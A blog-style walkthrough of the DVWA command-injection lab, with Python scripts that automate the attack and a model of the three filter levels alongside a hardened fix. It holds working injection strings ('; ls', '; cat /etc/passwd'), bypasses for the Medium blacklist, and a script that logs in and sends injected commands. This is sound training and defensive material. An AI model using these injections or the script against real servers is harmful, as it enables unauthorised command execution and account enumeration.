Sunday, 27 May 2012

DVWA COMMAND EXECUTION : LOW Level

1.) Open a browser and go to the DVWA login page (http://localhost/dvwa/Login.php).



2.) Enter the username admin and the password password, then click Login.



3.) Go to the DVWA Security page and change the script security setting
from high to low.



4.) Go to the Command Execution page in DVWA and submit an IP address to see what it does.



From the response we can tell that when we enter an IP address and press submit, the server runs the command ping -c 3 192.168.1.1 and returns its output. Now let's experiment and see what else we can get the server to run for us.

5.) Next, enter 192.168.1.1 ; ls as the IP address and see what happens.



Great! First we get back the same ping results, and then the output of ls, which tells us that there are two directories, help and source, and one file, index.php, in the directory where the commands are being executed. The semicolon ended the ping command and the shell ran ls as a second command.

6.) Let's find out where these commands are running, and where the files we just found are located, by entering ; pwd and reviewing the results.



Now we can see that the commands are being executed in the /srv/dvwa-nologin/vulnerabilities/exec directory, and this is also where our files are located.

7.) Let's find out which user we are executing commands as, and what processes are running on the machine, by entering ; whoami ; ps and viewing the results. Note that ps with no options only lists processes that belong to the same user and terminal; to see every process on the machine use ; ps aux instead.



Now we can see that we are executing commands as the www-data user (the web server's account), and we get a list of the processes it can see.

8.) Let's see which accounts exist on this machine with the ; cat /etc/passwd command (the usernames can later be used in a password-guessing attack aimed at gaining superuser access).



The /etc/passwd file is a text-based database of the users that may log in to the system and of the other operating-system identities that own running processes. On a modern system it contains no password hashes; those live in /etc/shadow, which www-data normally cannot read. What this step gives an attacker is the list of usernames, shells and home directories, not the hashes themselves.

If you go to the links listed under More info you can try out some more commands. This is just a sample of the many things that could be done.
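The eight steps above, driven from a script instead of the browser, as an added example (this is not code from the original post or from DVWA). It uses only the Python standard library. The exec form fields ip and submit are taken from the Low source shown further down; everything else is assumed: the login fields username, password and Login (DVWA's file is the lowercase login.php), the security-page fields security and seclev_submit, the path vulnerabilities/exec/, the "Login failed" message text, and the absence of a CSRF token, which this 2012-era DVWA did not have.

```python
"""Drive the Command Execution exercise from a script instead of the browser.

Added example, not code from the original post or from DVWA. Standard library only.
Assumed (not shown on the page): the login form fields `username`, `password`, `Login`;
the security form fields `security`, `seclev_submit`; the page paths under BASE_URL;
the 'Login failed' message text; and that this 2012-era DVWA uses no CSRF token.
The exec form fields `ip` and `submit` come from the Low source listed on the page.
"""
import html
import re
import urllib.parse
import urllib.request
from http.cookiejar import CookieJar

BASE_URL = "http://localhost/dvwa"  # assumption: point this at your own lab instance


def build_injection(ip, cmd, separator=";"):
    """Value for the `ip` box: a real ping target, a shell separator, the command.

    The separator is what turns 'ping -c 3 <ip>' into two commands; ';' is the one
    the walkthrough above uses at the Low level."""
    return "{} {} {}".format(ip, separator, cmd)


def extract_output(page):
    """Return the text of every <pre>...</pre> block in the response.

    exec/index.php echoes the raw shell_exec() output inside <pre>, so the ping
    transcript and the injected command's output come back in the same block."""
    blocks = re.findall(r"<pre>(.*?)</pre>", page, flags=re.DOTALL)
    return [html.unescape(b).strip() for b in blocks]


def injected_part(pre_text):
    """Everything after the ping statistics, i.e. the injected command's output.

    Linux ping prints '--- <host> ping statistics ---' followed by a packets line
    and an optional 'rtt' line; the injected output follows. Without the marker
    (e.g. Windows ping) the block is returned unchanged."""
    marker = re.search(r"^--- .* ping statistics ---$", pre_text, flags=re.MULTILINE)
    if not marker:
        return pre_text
    tail = pre_text[marker.end():].splitlines()
    while tail and (not tail[0].strip() or "packets transmitted" in tail[0]
                    or tail[0].startswith("rtt ")):
        tail.pop(0)
    return "\n".join(tail).strip()


class DvwaSession:
    """Cookie-carrying HTTP client for the steps of the walkthrough."""

    def __init__(self, base_url=BASE_URL):
        self.base = base_url.rstrip("/")
        self.opener = urllib.request.build_opener(
            urllib.request.HTTPCookieProcessor(CookieJar()))

    def post(self, path, fields):
        data = urllib.parse.urlencode(fields).encode()
        with self.opener.open(self.base + "/" + path, data=data, timeout=10) as resp:
            return resp.read().decode("utf-8", "replace")

    def login(self, user="admin", password="password"):          # step 2
        page = self.post("login.php", {"username": user, "password": password, "Login": "Login"})
        if "Login failed" in page:  # assumption: DVWA's failure message text
            raise RuntimeError("DVWA login failed")

    def set_security(self, level="low"):                         # step 3
        self.post("security.php", {"security": level, "seclev_submit": "Submit"})

    def inject(self, cmd, ip="127.0.0.1", separator=";"):        # steps 4-8
        fields = {"ip": build_injection(ip, cmd, separator), "submit": "submit"}
        page = self.post("vulnerabilities/exec/", fields)
        return [injected_part(block) for block in extract_output(page)]


if __name__ == "__main__":
    s = DvwaSession()
    s.login()
    s.set_security("low")
    for command in ("ls", "pwd", "whoami", "cat /etc/passwd"):
        print("$ " + command)
        for out in s.inject(command):
            print(out)
```

The separator argument is there because ";" is only one of the characters the shell treats as a command boundary; the same script can be pointed at the Medium level with separator="|" once that source has been read.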

Now let's look at the source code of the vulnerable page. DVWA ships three versions, selected by the security level:


High Command Execution Source
<?php

if( isset( $_POST[ 'submit' ] ) ) {

$target = $_REQUEST["ip"];

$target = stripslashes( $target );


// Split the IP into 4 octets
$octet = explode(".", $target);

// Check IF each octet is an integer
if ((is_numeric($octet[0])) && (is_numeric($octet[1])) && (is_numeric($octet[2])) && (is_numeric($octet[3])) && (sizeof($octet) == 4) ) {

// If all 4 octets are int's put the IP back together.
$target = $octet[0].'.'.$octet[1].'.'.$octet[2].'.'.$octet[3];


// Determine OS and execute the ping command.
if (stristr(php_uname('s'), 'Windows NT')) {

$cmd = shell_exec( 'ping ' . $target );
echo '<pre>'.$cmd.'</pre>';

} else {

$cmd = shell_exec( 'ping -c 3 ' . $target );
echo '<pre>'.$cmd.'</pre>';

}

}

else {
echo '<pre>ERROR: You have entered an invalid IP</pre>';
}


}

?>


Medium Command Execution Source
<?php

if( isset( $_POST[ 'submit'] ) ) {

$target = $_REQUEST[ 'ip' ];

// Remove any of the characters in the array (blacklist).
$substitutions = array(
'&&' => '',
';' => '',
);

// Note: '|', '||' and a single '&' are not in the blacklist, and str_replace
// makes one pass per search string, so '&;&' becomes '&&' once ';' is removed.
$target = str_replace( array_keys( $substitutions ), $substitutions, $target );

// Determine OS and execute the ping command.
// (Remainder completed to match the Low source; the page's copy stops at this comment.)
if (stristr(php_uname('s'), 'Windows NT')) {

$cmd = shell_exec( 'ping ' . $target );
echo '<pre>'.$cmd.'</pre>';

} else {

$cmd = shell_exec( 'ping -c 3 ' . $target );
echo '<pre>'.$cmd.'</pre>';

}

}

?>

Low Command Execution Source
<?php

if( isset( $_POST[ 'submit' ] ) ) {

// Taken straight from the request (GET or POST) with no validation or escaping.
$target = $_REQUEST[ 'ip' ];

// Determine OS and execute the ping command.
if (stristr(php_uname('s'), 'Windows NT')) {

$cmd = shell_exec( 'ping ' . $target );
echo '<pre>'.$cmd.'</pre>';

} else {

// $target is concatenated onto the command line; ';', '|', '&' etc. end the ping
// argument and start a second command.
$cmd = shell_exec( 'ping -c 3 ' . $target );
echo '<pre>'.$cmd.'</pre>';

}

}
?>
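The three filters above, modelled in Python so they can be exercised side by side without a shell, plus the fix the page does not show (strict IP parsing and an argv call with no shell involved). This is an added example, not DVWA's code. survives() and SHELL_CONTROL are an assumed, illustrative check: any shell control character left in the string that would reach shell_exec() is counted as a working injection; NUMERIC is an approximation of PHP's is_numeric(). ping_argv() and safe_ping() are my own hardened replacement, not part of DVWA.

```python
"""Python model of DVWA's Low / Medium / High Command Execution filters.

Added example, not DVWA's own code. Each *_filter returns the string that would be
concatenated into 'ping -c 3 ' + target, or None where the page prints
'ERROR: You have entered an invalid IP'. survives() and SHELL_CONTROL are an
assumed, illustrative test: any unquoted shell control character that reaches
shell_exec() is counted as a working injection. NUMERIC approximates PHP is_numeric().
"""
import ipaddress
import re
import subprocess

# Characters the shell behind shell_exec() treats as separators or substitution.
SHELL_CONTROL = re.compile(r"[;&|`$()<>\n]")
# Approximation of PHP is_numeric() for one dot-free octet: leading blanks, sign, exponent.
NUMERIC = re.compile(r"\s*[+-]?\d+([eE][+-]?\d+)?")


def low_filter(target):
    """Low: $_REQUEST['ip'] goes to the shell untouched."""
    return target


def medium_filter(target):
    """Medium: str_replace(array('&&', ';'), '', $target).

    PHP applies the searches one after another, so removing ';' can create
    a new '&&' (e.g. '&;&'), and '|', '||' and a single '&' were never listed."""
    target = target.replace("&&", "")
    return target.replace(";", "")


def high_filter(target):
    """High: split on '.', require exactly four numeric octets, then rebuild."""
    octets = target.split(".")
    if len(octets) == 4 and all(NUMERIC.fullmatch(o) for o in octets):
        return ".".join(octets)
    return None


def is_injectable(filtered):
    """Assumed check: does a shell control character survive into the command line?"""
    return filtered is not None and SHELL_CONTROL.search(filtered) is not None


def survives(level, payload):
    """Does this payload still carry a shell control character at the given level?"""
    filters = {"low": low_filter, "medium": medium_filter, "high": high_filter}
    return is_injectable(filters[level](payload))


def ping_argv(target):
    """Hardened replacement for the string concatenation: parse the address as an
    IPv4 address (ValueError on anything else) and build an argv list, so no shell
    ever parses the input."""
    ip = ipaddress.IPv4Address(target.strip())
    return ["ping", "-c", "3", str(ip)]


def safe_ping(target, timeout=15):
    """Run the hardened ping; shell=False is the subprocess default."""
    proc = subprocess.run(ping_argv(target), capture_output=True, text=True, timeout=timeout)
    return proc.stdout


if __name__ == "__main__":
    for payload in ("192.168.1.1; ls", "192.168.1.1 | ls", "192.168.1.1 &;& ls"):
        levels = [lvl for lvl in ("low", "medium", "high") if survives(lvl, payload)]
        print(repr(payload), "injects at:", levels)
```

The point of ping_argv() is that the High filter is still a string-level allow list glued into a shell command; replacing the shell with an argv call removes the whole class of bug rather than one more separator, and ipaddress rejects anything that is not an address before the process is even started.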
